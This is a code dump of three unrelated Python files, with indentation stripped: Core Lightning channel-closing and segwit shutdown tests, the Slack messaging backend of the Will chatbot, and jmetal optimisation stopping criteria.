l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.fundchannel(l2, 1000000, False)
@pytest.mark.developer("needs to set upfront_shutdown_script")
@pytest.mark.slow_test
def test_segwit_shutdown_script(node_factory, bitcoind, executor):
"""
Try a range of future segwit versions as shutdown scripts. We create many nodes, so this is quite slow under valgrind
"""
l1 = node_factory.get_node(allow_warning=True)
# BOLT #2:
# 5. if (and only if) `option_shutdown_anysegwit` is negotiated:
# * `OP_1` through `OP_16` inclusive, followed by a single push of 2 to 40 bytes
# (witness program versions 1 through 16)
edge_valid = ['51020000', '5128' + '00' * 0x28,
'60020000', '6028' + '00' * 0x28]
other_valid = ['52020000', '5228' + '00' * 0x28,
'53020000', '5328' + '00' * 0x28,
'54020000', '5428' + '00' * 0x28,
'55020000', '5528' + '00' * 0x28,
'56020000', '5628' + '00' * 0x28,
'57020000', '5728' + '00' * 0x28,
'58020000', '5828' + '00' * 0x28,
'59020000', '5928' + '00' * 0x28,
'5A020000', '5A28' + '00' * 0x28,
'5B020000', '5B28' + '00' * 0x28,
'5C020000', '5C28' + '00' * 0x28,
'5D020000', '5D28' + '00' * 0x28,
'5E020000', '5E28' + '00' * 0x28,
'5F020000', '5F28' + '00' * 0x28]
invalid = ['50020000', # Not OP_1-OP_16
'61020000', # Not OP_1-OP_16
'5102000000', # Extra bytes
'510100', # Too short
'5129' + '00' * 0x29] # Too long
# Don't stress CI; just test edge cases
if SLOW_MACHINE:
valid = edge_valid
else:
valid = edge_valid + other_valid
# More efficient to create them all up-front.
nodes = node_factory.get_nodes(len(valid) + len(invalid))
# Give it one UTXO to spend for each node.
addresses = {}
for n in nodes:
addresses[l1.rpc.newaddr()['bech32']] = (10**6 + 100000) / 10**8
bitcoind.rpc.sendmany("", addresses)
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == len(addresses))
# FIXME: Since we don't support other non-v0 encodings, we need a protocol
# test for this (we're actually testing our upfront check, not the real
# shutdown one!),
for script in valid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
for script in invalid:
# Insist on upfront script we're not going to match.
l1.stop()
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = script
l1.start()
l2 = nodes.pop()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
with pytest.raises(RpcError, match=r'Unacceptable upfront_shutdown_script'):
l1.rpc.fundchannel(l2.info['id'], 10**6)
@unittest.skipIf(not EXPERIMENTAL_FEATURES, "Needs anchor_outputs")
@pytest.mark.developer("needs to set dev-disconnect")
def test_closing_higherfee(node_factory, bitcoind, executor):
"""With anchor outputs we can ask for a *higher* fee than the last commit tx"""
# We change the feerate before it starts negotiating close, so it aims
# for *higher* than last commit tx.
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500),
'disconnect': ['-WIRE_CLOSING_SIGNED']},
{'may_reconnect': True,
'dev-no-reconnect': None,
'feerates': (7500, 7500, 7500, 7500)}])
# This will trigger disconnect.
fut = executor.submit(l1.rpc.close, l2.info['id'])
l1.daemon.wait_for_log('dev_disconnect')
# Now adjust fees so l1 asks for more on reconnect.
l1.set_feerates((30000,) * 4, False)
l2.set_feerates((30000,) * 4, False)
l1.restart()
l2.restart()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# This causes us to *exceed* previous requirements!
l1.daemon.wait_for_log(r'deriving max fee from rate 30000 -> 16440sat \(not 1000000sat\)')
# This will fail because l1 restarted!
with pytest.raises(RpcError, match=r'Channel forgotten before proper close.'):
fut.result(TIMEOUT)
# But we still complete negotiation!
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
wait_for(lambda: only_one(l2.rpc.listpeers()['peers'])['channels'][0]['state'] == 'CLOSINGD_COMPLETE')
@unittest.skipIf(True, "Test is extremely flaky")
@pytest.mark.developer("needs dev_disconnect")
def test_htlc_rexmit_while_closing(node_factory, executor):
"""Retranmitting an HTLC revocation while shutting down should work"""
# FIXME: This should be in lnprototest! UNRELIABLE.
# l1 disconnects after sending second COMMITMENT_SIGNED.
# Then it stops receiving after sending WIRE_SHUTDOWN (which is before it
# reads the revoke_and_ack).
disconnects = ['+WIRE_COMMITMENT_SIGNED*2',
'xWIRE_SHUTDOWN']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
# Start payment, will disconnect
l1.pay(l2, 200000)
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)
# Tell it to close (will block)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# Original problem was with multiple disconnects, but to simplify we make
# l2 send shutdown too.
fut2 = executor.submit(l2.rpc.close, l1.info['id'])
# Reconnect, shutdown will continue disconnect again
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# Now l2 should be in CLOSINGD_SIGEXCHANGE, l1 still waiting on
# WIRE_REVOKE_AND_ACK.
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CHANNELD_SHUTTING_DOWN'
# They don't realize they're not talking, so disconnect and reconnect.
l1.rpc.disconnect(l2.info['id'], force=True)
# Now it hangs, since l1 is expecting rexmit of revoke-and-ack.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
fut2.result(TIMEOUT)
@pytest.mark.openchannel('v1')
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel(node_factory, executor):
"""Ideally you'd keep talking to us about closed channels: simple"""
disconnects = ['xWIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 reconnects, it should succeed.
l1.rpc.disconnect(l2.info['id'], force=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@pytest.mark.developer("needs dev_disconnect")
def test_you_forgot_closed_channel_onchain(node_factory, bitcoind, executor):
"""Ideally you'd keep talking to us about closed channels: even if close is mined"""
disconnects = ['xWIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True,
'dev-no-reconnect': None,
'disconnect': disconnects},
{'may_reconnect': True,
'dev-no-reconnect': None}])
l1.pay(l2, 200000)
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 considers the closing done, l1 does not
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
assert only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_SIGEXCHANGE'
# l1 does not see any new blocks.
def no_new_blocks(req):
return {"result": {"blockhash": None, "block": None}}
l1.daemon.rpcproxy.mock_rpc('getrawblockbyheight', no_new_blocks)
# Close transaction mined
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: only_one(only_one(l2.rpc.listpeers()['peers'])['channels'])['state'] == 'ONCHAIN')
# l1 reconnects, it should succeed.
# l1 will disconnect once it sees block
wait_for(lambda: only_one(l1.rpc.listpeers()['peers'])['connected'] is False)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
fut.result(TIMEOUT)
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
@pytest.mark.developer("too slow without fast polling for blocks")
def test_segwit_anyshutdown(node_factory, bitcoind, executor):
"""Try a range of future segwit versions for shutdown"""
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1.fundwallet(10**7)
# Based on BIP-320, but all changed to regtest.
addrs = ("BCRT1QW508D6QEJXTDG4Y5R3ZARVARY0C5XW7KYGT080",
"bcrt1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qzf4jry",
"bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56",
"BCRT1SW50QT2UWHA",
"bcrt1zw508d6qejxtdg4y5r3zarvaryv2wuatf",
"bcrt1qqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvseswlauz7",
"bcrt1pqqqqp399et2xygdj5xreqhjjvcmzhxw4aywxecjdzew6hylgvsesyga46z",
"bcrt1p0xlxvlhemja6c4dqv22uapctqupfhlxm9h8z3k2e72q4k9hcz7vqc8gma6")
for addr in addrs:
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
# If we don't actually make a payment, two of the above cases fail
# because the resulting tx is too small! Balance channel so close
# has two outputs.
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: any([c['state'] == 'CHANNELD_NORMAL' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
l1.pay(l2, 10**9 // 2)
l1.rpc.close(l2.info['id'], destination=addr)
bitcoind.generate_block(1, wait_for_mempool=1)
wait_for(lambda: all([c['state'] == 'ONCHAIN' for c in only_one(l1.rpc.listpeers()['peers'])['channels']]))
@pytest.mark.developer("needs to manipulate features")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Uses regtest addresses")
def test_anysegwit_close_needs_feature(node_factory, bitcoind):
"""Rather than have peer reject our shutdown, we should refuse to shutdown toa v1+ address if they don't support it"""
# L2 says "no option_shutdown_anysegwit"
l1, l2 = node_factory.line_graph(2, opts=[{'may_reconnect': True},
{'may_reconnect': True,
'dev-force-features': -27}])
with pytest.raises(RpcError, match=r'Peer does not allow v1\+ shutdown addresses'):
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
# From TFM: "Tell your friends to upgrade!"
l2.stop()
del l2.daemon.opts['dev-force-features']
l2.start()
# Now it will work!
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.close(l2.info['id'], destination='bcrt1pw508d6qejxtdg4y5r3zarvary0c5xw7kw508d6qejxtdg4y5r3zarvary0c5xw7k0ylj56')
wait_for(lambda: only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CLOSINGD_COMPLETE')
bitcoind.generate_block(1, wait_for_mempool=1)
def test_close_feerate_range(node_factory, bitcoind, chainparams):
"""Test the quick-close fee range negotiation"""
l1, l2 = node_factory.line_graph(2)
notifications = []
def save_notifications(message, progress, request, **kwargs):
notifications.append(message)
# Lowball the range here.
with l1.rpc.notify(save_notifications):
l1.rpc.close(l2.info['id'], feerange=['253perkw', 'normal'])
if not chainparams['elements']:
l1_range = [138, 4110]
l2_range = [1027, 1000000]
else:
# That fee output is a little chunky.
l1_range = [220, 6547]
l2_range = [1636, 1000000]
l1.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l1_range[0], l1_range[1]))
l2.daemon.wait_for_log('Negotiating closing fee between {}sat and {}sat satoshi'.format(l2_range[0], l2_range[1]))
overlap = [max(l1_range[0], l2_range[0]), min(l1_range[1], l2_range[1])]
l1.daemon.wait_for_log('performing quickclose in range {}sat-{}sat'.format(overlap[0], overlap[1]))
log = l1.daemon.is_in_log('Their actual closing tx fee is .*sat')
rate = re.match('.*Their actual closing tx fee is ([0-9]*sat).*', log).group(1)
assert notifications == ['Sending closing fee offer {}, with range {}sat-{}sat'.format(rate,
l1_range[0],
l1_range[1]),
'Received closing fee offer {}, with range {}sat-{}sat'.format(rate,
l2_range[0],
l2_range[1])]
def test_close_twice(node_factory, executor):
# First feerate is too low, second fixes it.
l1, l2 = node_factory.line_graph(2, opts=[{'allow_warning': True,
'may_reconnect': True},
{'allow_warning': True,
'may_reconnect': True,
'feerates': (15000, 15000, 15000, 15000)}])
# This makes it disconnect, since feerate is too low.
fut = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '500perkw'])
l1.daemon.wait_for_log('WARNING.*Unable to agree on a feerate')
fut2 = executor.submit(l1.rpc.close, l2.info['id'], feerange=['253perkw', '15000perkw'])
# Now reconnect, it should work.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
assert fut.result(TIMEOUT)['type'] == 'mutual'
assert fut2.result(TIMEOUT)['type'] == 'mutual'
def test_close_weight_estimate(node_factory, bitcoind):
"""closingd uses the expected closing tx weight to constrain fees; make sure that thord agrees
once it has the actual agreed tx"""
l1, l2 = node_factory.line_graph(2)
l1.rpc.close(l2.info['id'])
# Closingd gives this estimate before it begins
log = l1.daemon.wait_for_log('Expected closing weight = ')
expected_weight = int(re.match('.*Expected closing weight = ([0-9]*),.*', log).group(1))
# This is the actual weight: in theory this could use their
# actual sig, and thus vary, but we don't do that.
log = l1.daemon.wait_for_log('Their actual closing tx fee is')
actual_weight = int(re.match('.*: weight is ([0-9]*).*', log).group(1))
assert actual_weight == expected_weight
log = l1.daemon.wait_for_log('sendrawtransaction: ')
tx = re.match('.*sendrawtransaction: ([0-9a-f]*).*', log).group(1)
# This could actually be a bit shorter: 1 in 256 chance we get
# lucky with a sig and it's shorter. We have 2 sigs, so that's
# 1 in 128. Unlikely to do better than 2 bytes off though!
signed_weight = int(bitcoind.rpc.decoderawtransaction(tx)['weight'])
assert signed_weight <= actual_weight
assert signed_weight >= actual_weight - 2
|
slack.py
|
import json
import logging
import random
import re
import requests
import sys
import time
import traceback
from websocket import WebSocketConnectionClosedException
from markdownify import MarkdownConverter
from will import settings
from .base import IOBackend
from will.utils import Bunch, UNSURE_REPLIES, clean_for_pickling
from will.mixins import SleepMixin, StorageMixin
from multiprocessing import Process
from will.abstractions import Event, Message, Person, Channel
from slackclient import SlackClient
from slackclient.server import SlackConnectionError
SLACK_SEND_URL = "https://slack.com/api/chat.postMessage"
SLACK_SET_TOPIC_URL = "https://slack.com/api/channels.setTopic"
SLACK_PRIVATE_SET_TOPIC_URL = "https://slack.com/api/groups.setTopic"
class SlackMarkdownConverter(MarkdownConverter):
def convert_strong(self, el, text):
return '*%s*' % text if text else ''
class SlackBackend(IOBackend, SleepMixin, StorageMixin):
friendly_name = "Slack"
internal_name = "will.backends.io_adapters.slack"
required_settings = [
{
"name": "SLACK_API_TOKEN",
"obtain_at": """1. Go to https://api.slack.com/custom-integrations/legacy-tokens and sign in as yourself (or a user for Will).
2. Find the workspace you want to use, and click "Create token."
3. Set this token as SLACK_API_TOKEN."""
}
]
def get_channel_from_name(self, name):
for k, c in self.channels.items():
if c.name.lower() == name.lower() or c.id.lower() == name.lower():
return c
def normalize_incoming_event(self, event):
if (
"type" in event and
event["type"] == "message" and
("subtype" not in event or event["subtype"] != "message_changed") and
# Ignore thread summary events (for now.)
# TODO: We should stack these into the history.
("subtype" not in event or ("message" in event and "thread_ts" not in event["message"]) or event["subtype"] == "bot_message")
):
# print("slack: normalize_incoming_event - %s" % event)
# Sample of group message
# {u'source_team': u'T5ACF70KV', u'text': u'test',
# u'ts': u'1495661121.838366', u'user': u'U5ACF70RH',
# u'team': u'T5ACF70KV', u'type': u'message', u'channel': u'C5JDAR2S3'}
# Sample of 1-1 message
# {u'source_team': u'T5ACF70KV', u'text': u'test',
# u'ts': u'1495662397.335424', u'user': u'U5ACF70RH',
# u'team': u'T5ACF70KV', u'type': u'message', u'channel': u'D5HGP0YE7'}
# Threaded message
# {u'event_ts': u'1507601477.000073', u'ts': u'1507601477.000073',
# u'subtype': u'message_replied', u'message':
# {u'thread_ts': u'1507414046.000010', u'text': u'hello!',
# u'ts': u'1507414046.000010', u'unread_count': 2,
# u'reply_count': 2, u'user': u'U5GUL9D9N', u'replies':
# [{u'user': u'U5ACF70RH', u'ts': u'1507601449.000007'}, {
# u'user': u'U5ACF70RH', u'ts': u'1507601477.000063'}],
# u'type': u'message', u'bot_id': u'B5HL9ABFE'},
# u'type': u'message', u'hidden': True, u'channel': u'D5HGP0YE7'}
if event.get("subtype") == "bot_message":
bot = self.get_bot(event["bot_id"])
sender = Person(
id=event["bot_id"],
mention_handle="<@%s>" % event["bot_id"],
name=bot['name'],
handle=bot['name'],
source=event
)
event["text"] = event["attachments"][0]["fallback"]
else:
sender = self.people[event["user"]]
channel = clean_for_pickling(self.channels[event["channel"]])
# print "channel: %s" % channel
interpolated_handle = "<@%s>" % self.me.id
real_handle = "@%s" % self.me.handle
will_is_mentioned = False
will_said_it = False
is_private_chat = False
thread = None
if "thread_ts" in event:
thread = event["thread_ts"]
# If the parent thread is a 1-1 between Will and I, also treat that as direct.
# Since members[] still comes in on the thread event, we can trust this, even if we're
# in a thread.
if channel.id == channel.name:
is_private_chat = True
# <@U5GUL9D9N> hi
# TODO: if there's a thread with just will and I on it, treat that as direct.
is_direct = False
if is_private_chat or event["text"].startswith(interpolated_handle) or event["text"].startswith(real_handle):
is_direct = True
if event["text"].startswith(interpolated_handle):
event["text"] = event["text"][len(interpolated_handle):].strip()
if event["text"].startswith(real_handle):
event["text"] = event["text"][len(real_handle):].strip()
if interpolated_handle in event["text"] or real_handle in event["text"]:
will_is_mentioned = True
if event.get("user") == self.me.id:
will_said_it = True
m = Message(
content=event["text"],
type=event["type"],
is_direct=is_direct,
is_private_chat=is_private_chat,
is_group_chat=not is_private_chat,
backend=self.internal_name,
sender=sender,
channel=channel,
thread=thread,
will_is_mentioned=will_is_mentioned,
will_said_it=will_said_it,
backend_supports_acl=True,
original_incoming_event=clean_for_pickling(event),
)
return m
else:
# An event type the slack ba has no idea how to handle.
pass
def set_topic(self, event):
headers = {'Accept': 'text/plain'}
data = self.set_data_channel_and_thread(event)
data.update({
"token": settings.SLACK_API_TOKEN,
"as_user": True,
"topic": event.content,
})
if data["channel"].startswith("G"):
url = SLACK_PRIVATE_SET_TOPIC_URL
else:
url = SLACK_SET_TOPIC_URL
r = requests.post(
url,
headers=headers,
data=data,
**settings.REQUESTS_OPTIONS
)
self.handle_request(r, data)
def handle_outgoing_event(self, event):
if event.type in ["say", "reply"]:
if "kwargs" in event and "html" in event.kwargs and event.kwargs["html"]:
event.content = SlackMarkdownConverter().convert(event.content)
event.content = event.content.replace("&", "&")
event.content = event.content.replace("\_", "_")
kwargs = {}
if "kwargs" in event:
kwargs.update(**event.kwargs)
if hasattr(event, "source_message") and event.source_message and "channel" not in kwargs:
self.send_message(event)
else:
# Came from webhook/etc
# TODO: finish this.
target_channel = kwargs.get("room", kwargs.get("channel", None))
if target_channel:
event.channel = self.get_channel_from_name(target_channel)
if event.channel:
self.send_message(event)
else:
logging.error(
"I was asked to post to the slack %s channel, but it doesn't exist.",
target_channel
)
if self.default_channel:
event.channel = self.get_channel_from_name(self.default_channel)
event.content = event.content + " (for #%s)" % target_channel
self.send_message(event)
elif self.default_channel:
event.channel = self.get_channel_from_name(self.default_channel)
self.send_message(event)
else:
logging.critical(
"I was asked to post to a slack default channel, but I'm nowhere."
"Please invite me somewhere with '/invite @%s'", self.me.handle
)
if event.type in ["topic_change", ]:
self.set_topic(event)
elif (
event.type == "message.no_response" and
event.data.is_direct and
event.data.will_said_it is False
):
event.content = random.choice(UNSURE_REPLIES)
self.send_message(event)
def handle_request(self, r, data):
resp_json = r.json()
if not resp_json["ok"]:
if resp_json["error"] == "not_in_channel":
channel = self.get_channel_from_name(data["channel"])
if not hasattr(self, "me") or not hasattr(self.me, "handle"):
self.people
logging.critical(
"I was asked to post to the slack %s channel, but I haven't been invited. "
"Please invite me with '/invite @%s'" % (channel.name, self.me.handle)
)
else:
logging.error("Error sending to slack: %s" % resp_json["error"])
logging.error(resp_json)
assert resp_json["ok"]
def set_data_channel_and_thread(self, event, data={}):
if "channel" in event:
# We're coming off an explicit set.
channel_id = event.channel.id
else:
if "source_message" in event:
# Mentions that come back via self.say()
if hasattr(event.source_message, "data"):
channel_id = event.source_message.data.channel.id
if hasattr(event.source_message.data, "thread"):
data.update({
"thread_ts": event.source_message.data.thread
})
else:
# Mentions that come back via self.say() with a specific room (I think)
channel_id = event.source_message.channel.id
if hasattr(event.source_message, "thread"):
data.update({
"thread_ts": event.source_message.thread
})
else:
# Mentions that come back via self.reply()
if hasattr(event.data, "original_incoming_event"):
if hasattr(event.data.original_incoming_event.channel, "id"):
channel_id = event.data.original_incoming_event.channel.id
else:
channel_id = event.data.original_incoming_event.channel
else:
if hasattr(event.data["original_incoming_event"].data.channel, "id"):
channel_id = event.data["original_incoming_event"].data.channel.id
else:
channel_id = event.data["original_incoming_event"].data.channel
try:
# If we're starting a thread
if "kwargs" in event and "start_thread" in event.kwargs and event.kwargs["start_thread"] and ("thread_ts" not in data or not data["thread_ts"]):
if hasattr(event.source_message, "original_incoming_event"):
data.update({
"thread_ts": event.source_message.original_incoming_event["ts"]
})
elif (
hasattr(event.source_message, "data") and
hasattr(event.source_message.data, "original_incoming_event") and
"ts" in event.source_message.data.original_incoming_event
):
logging.error(
"Hm. I was told to start a new thread, but while using .say(), instead of .reply().\n"
"This doesn't really make sense, but I'm going to make the best of it by pretending you "
"used .say() and threading off of your message.\n"
"Please update your plugin to use .reply() when you have a second!"
)
data.update({
"thread_ts": event.source_message.data.original_incoming_event["ts"]
})
else:
if hasattr(event.data.original_incoming_event, "thread_ts"):
data.update({
"thread_ts": event.data.original_incoming_event.thread_ts
})
elif "thread" in event.data.original_incoming_event.data:
data.update({
"thread_ts": event.data.original_incoming_event.data.thread
})
except:
logging.info(traceback.format_exc().split(" ")[-1])
pass
data.update({
"channel": channel_id,
})
return data
def send_message(self, event):
data = {}
if hasattr(event, "kwargs"):
data.update(event.kwargs)
# Add slack-specific functionality
if "color" in event.kwargs:
data.update({
"attachments": json.dumps([
{
"fallback": event.content,
"color": self._map_color(event.kwargs["color"]),
"text": event.content,
}
]),
})
elif "attachments" in event.kwargs:
data.update({
"text": event.content,
"attachments": json.dumps(event.kwargs["attachments"])
})
else:
data.update({
"text": event.content,
})
else:
data.update({
"text": event.content,
})
data = self.set_data_channel_and_thread(event, data=data)
# Auto-link mention names
if "text" in data:
if data["text"].find("<@") != -1:
data["text"] = data["text"].replace("<@", "<@")
data["text"] = data["text"].replace(">", ">")
elif "attachments" in data and "text" in data["attachments"][0]:
if data["attachments"][0]["text"].find("<@") != -1:
data["attachments"][0]["text"] = data["attachments"][0]["text"].replace("<@", "<@")
data["attachments"][0]["text"] = data["attachments"][0]["text"].replace(">", ">")
data.update({
"token": settings.SLACK_API_TOKEN,
"as_user": True,
})
if hasattr(event, "kwargs") and "html" in event.kwargs and event.kwargs["html"]:
data.update({
"parse": "full",
})
headers = {'Accept': 'text/plain'}
r = requests.post(
SLACK_SEND_URL,
headers=headers,
data=data,
**settings.REQUESTS_OPTIONS
)
self.handle_request(r, data)
def _map_color(self, color):
# Turn colors into hex values, handling old slack colors, etc
if color == "red":
return "danger"
elif color == "yellow":
return "warning"
elif color == "green":
return "good"
return color
def join_channel(self, channel_id):
return self.client.api_call(
"channels.join",
channel=channel_id,
)
def get_bot(self, bot_id):
# Uses the bots.info Slack method to retrieve info on a bot by ID,
# and saves it locally on self._bots. If the bot is already saved,
# we return the saved copy.
bot = None
if not hasattr(self, '_bots'):
self._bots = {}
if bot_id in self._bots:
bot = self._bots[bot_id]
else:
bot_api_data = self.client.api_call("bots.info", bot=bot_id)
if bot_api_data['ok']:
self._bots[bot_id] = {
'name': bot_api_data['bot']['name'],
'app_id': bot_api_data['bot']['app_id'],
'id': bot_api_data['bot']['id']
}
bot = self._bots[bot_id]
else:
logging.error("Failed to find bot with id: {0}".format(bot_id))
return bot
@property
def people(self):
if not hasattr(self, "_people") or self._people is {}:
self._update_people()
return self._people
@property
def default_channel(self):
if not hasattr(self, "_default_channel") or not self._default_channel:
self._decide_default_channel()
return self._default_channel
@property
def channels(self):
if not hasattr(self, "_channels") or self._channels is {}:
self._update_channels()
return self._channels
@property
def client(self):
if not hasattr(self, "_client"):
self._client = SlackClient(settings.SLACK_API_TOKEN)
return self._client
def _decide_default_channel(self):
self._default_channel = None
if not hasattr(self, "complained_about_default"):
self.complained_about_default = False
self.complained_uninvited = False
# Set self.me
self.people
if hasattr(settings, "SLACK_DEFAULT_CHANNEL"):
channel = self.get_channel_from_name(settings.SLACK_DEFAULT_CHANNEL)
if channel:
if self.me.id in channel.members:
self._default_channel = channel.id
return
elif not self.complained_about_default:
self.complained_about_default = True
logging.error("The defined default channel(%s) does not exist!",
settings.SLACK_DEFAULT_CHANNEL)
for c in self.channels.values():
if c.name != c.id and self.me.id in c.members:
self._default_channel = c.id
if not self._default_channel and not self.complained_uninvited:
self.complained_uninvited = True
logging.critical("No channels with me invited! No messages will be sent!")
def _update_channels(self):
channels = {}
for c in self.client.server.channels:
members = {}
for m in c.members:
members[m] = self.people[m]
channels[c.id] = Channel(
id=c.id,
name=c.name,
source=clean_for_pickling(c),
members=members
)
if len(channels.keys()) == 0:
# Server isn't set up yet, and we're likely in a processing thread,
if self.load("slack_channel_cache", None):
self._channels = self.load("slack_channel_cache", None)
else:
self._channels = channels
self.save("slack_channel_cache", channels)
def _update_people(self):
people = {}
self.handle = self.client.server.username
for k, v in self.client.server.users.items():
user_timezone = None
if v.tz:
user_timezone = v.tz
people[k] = Person(
id=v.id,
mention_handle="<@%s>" % v.id,
handle=v.name,
source=clean_for_pickling(v),
name=v.real_name,
)
if v.name == self.handle:
self.me = Person(
id=v.id,
mention_handle="<@%s>" % v.id,
handle=v.name,
source=clean_for_pickling(v),
name=v.real_name,
)
if user_timezone and user_timezone != 'unknown':
people[k].timezone = user_timezone
if v.name == self.handle:
self.me.timezone = user_timezone
if len(people.keys()) == 0:
# Server isn't set up yet, and we're likely in a processing thread,
if self.load("slack_people_cache", None):
self._people = self.load("slack_people_cache", None)
if not hasattr(self, "me") or not self.me:
self.me = self.load("slack_me_cache", None)
if not hasattr(self, "handle") or not self.handle:
self.handle = self.load("slack_handle_cache", None)
else:
self._people = people
self.save("slack_people_cache", people)
self.save("slack_me_cache", self.me)
self.save("slack_handle_cache", self.handle)
def _update_backend_metadata(self):
self._update_people()
self._update_channels()
def _watch_slack_rtm(self):
while True:
try:
if self.client.rtm_connect(auto_reconnect=True):
self._update_backend_metadata()
num_polls_between_updates = 30 / settings.EVENT_LOOP_INTERVAL # Every 30 seconds
current_poll_count = 0
while True:
events = self.client.rtm_read()
if len(events) > 0:
# TODO: only handle events that are new.
# print(len(events))
for e in events:
self.handle_incoming_event(e)
# Update channels/people/me/etc every 10s or so.
current_poll_count += 1
if current_poll_count > num_polls_between_updates:
self._update_backend_metadata()
current_poll_count = 0
self.sleep_for_event_loop()
except (WebSocketConnectionClosedException, SlackConnectionError):
logging.error('Encountered connection error attempting reconnect in 2 seconds')
time.sleep(2)
except (KeyboardInterrupt, SystemExit):
break
except:
logging.critical("Error in watching slack RTM: \n%s" % traceback.format_exc())
break
def bootstrap(self):
# Bootstrap must provide a way to to have:
# a) self.normalize_incoming_event fired, or incoming events put into self.incoming_queue
# b) any necessary threads running for a)
# c) self.me (Person) defined, with Will's info
# d) self.people (dict of People) defined, with everyone in an organization/backend
# e) self.channels (dict of Channels) defined, with all available channels/rooms.
# Note that Channel asks for members, a list of People.
# f) A way for self.handle, self.me, self.people, and self.channels to be kept accurate,
# with a maximum lag of 60 seconds.
# Property, auto-inits.
self.client
self.rtm_thread = Process(target=self._watch_slack_rtm)
self.rtm_thread.start()
def terminate(self):
if hasattr(self, "rtm_thread"):
self.rtm_thread.terminate()
while self.rtm_thread.is_alive():
time.sleep(0.2)
|
termination_criterion.py
|
import threading
from abc import ABC, abstractmethod
from jmetal.core.observer import Observer
from jmetal.core.quality_indicator import QualityIndicator
"""
.. module:: termination_criterion
:platform: Unix, Windows
:synopsis: Implementation of stopping conditions.
.. moduleauthor:: Antonio Benítez-Hidalgo <antonio.b@uma.es>
"""
class TerminationCriterion(Observer, ABC):
@abstractmethod
def update(self, *args, **kwargs):
pass
@property
@abstractmethod
def is_met(self):
pass
@abstractmethod
def get_criterion(self):
pass
class StoppingByEvaluations(TerminationCriterion):
def get_criterion(self):
return self.max_evaluations
def __init__(self, max: int):
super(StoppingByEvaluations, self).__init__()
self.max_evaluations = max
self.evaluations = 0
def update(self, *args, **kwargs):
self.evaluations = kwargs['EVALUATIONS']
@property
def is_met(self):
return self.evaluations >= self.max_evaluations
class StoppingByTime(TerminationCriterion):
def __init__(self, max_seconds: int):
super(StoppingByTime, self).__init__()
self.max_seconds = max_seconds
self.seconds = 0.0
def update(self, *args, **kwargs):
self.seconds = kwargs['COMPUTING_TIME']
@property
def is_met(self):
return self.seconds >= self.max_seconds
def get_criterion(self):
return self.max_seconds
def key_has_been_pressed(stopping_by_keyboard):
input('PRESS ANY KEY + ENTER: ')
stopping_by_keyboard.key_pressed = True
class StoppingByKeyboard(TerminationCriterion):
def __init__(self):
super(StoppingByKeyboard, self).__init__()
self.key_pressed = False
thread = threading.Thread(target=key_has_been_pressed, args=(self,))
thread.start()
